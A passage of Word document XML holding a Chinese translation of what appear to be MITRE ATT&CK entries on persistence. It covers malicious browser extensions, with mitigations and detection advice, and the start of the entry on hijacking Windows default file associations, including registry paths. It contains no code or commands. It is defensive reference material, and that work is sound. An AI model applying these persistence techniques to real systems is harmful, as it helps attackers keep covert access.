            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2667A065" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7080F916" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE0BC40" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>协议分析，网络抓包，系统调用，网络进程使用，进程监控，浏览器扩展</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA2B573" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Justin Warner</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>ICEBRG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3317BA38" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00A1F05F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8F1FD6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器扩展或插件是可以添加功能和自定义互联网浏览器特征的小程序。它们可以直接安装，也可以通过浏览器的应用商店安装。扩展程序通常对浏览器可以访问的所有内容都有访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C53ED8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="7A08AB33" w14:textId="0D44F6D1" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意扩展程序可以伪装成合法扩展程序在应用商店下载、通过社交工程或已攻破系统的攻击者安装到浏览器中。浏览器应用商店的安全性可能受到限制，因此恶意扩展程序击败自动扫描程序并上传可能并不困难。一旦安装了扩展程序，它就可以在后台浏览到网站，窃取用户输入浏览器的所有信息，包括凭据，并用作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安装程序以获得持久性。有僵尸网络通过恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩展程序使用持久后门的情况。也有类似的扩展程序用于</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399CAF5A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00767F4B" w14:paraId="737958FD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4AFFD1DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00767F4B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00767F4B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5322A74F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00767F4B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00767F4B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="61AB2E66" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1157D334" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714E3DF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保安装的扩展程序是预期的，因为许多恶意扩展程序会伪装成合法程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="178A6768" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F1FF5F6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>执行预防</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="082BE8B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>根据您的安全策略设置浏览器扩展程序白名单或黑名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="435BF51D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33ADAE7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>软件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="290BC39C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>仅从可以验证的可信来源安装浏览器扩展程序。某些浏览器的扩展程序可以通过组策略进行控制。更改设置来防止浏览器在没有足够权限的情况下安装扩展程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="45A62E4F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39D73147" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F8A3F2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>完成使用后关闭所有浏览器会话，防止任何潜在的恶意扩展程序继续运行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="134B76CD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511951BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361B380" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清点和监控与正常、预期及良性扩展程序不同的浏览器扩展程序的安装。进程和网络监控可用于检测与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器通信的浏览器。然而，根据过程中生成的流量性质和数量来看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，这</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于初始</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>扩展</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>困难</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控写入注册表的任何新项目或写入磁盘的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，因为这可能与浏览器扩展程序安装有关。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6630084B" w14:textId="106547C9" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00D720CF" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认文件关联</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7AF96577" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BBB1A6F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1042</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F1F176" w14:textId="4F346F84" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C90D3D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330DC10A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B37B58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8FA939" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId48" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-556</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B5BC9C6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Stefan Kanthak</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B587125" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CB67BF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBDB42E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开文件时，将检查用于打开文件的默认程序（也称为文件关联或处理程序）。文件关联选择存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表中，可以由有注册表访问权限的用户、管理员或程序编辑，也可以由管理员使用内置的关联实用程序编辑。应用程序可以修改给定文件扩展名的文件关联，以便在打开具有给定扩展名的文件时调用任意程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB60433" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统文件关联列在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT.[extension]</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这些条目指向位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT[handler]</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的该扩展的处理程序。然后，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT[handler]\shell[action]\command</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的shell键下，将各种命令列为子键，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT\txtfile\shell\open\command</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
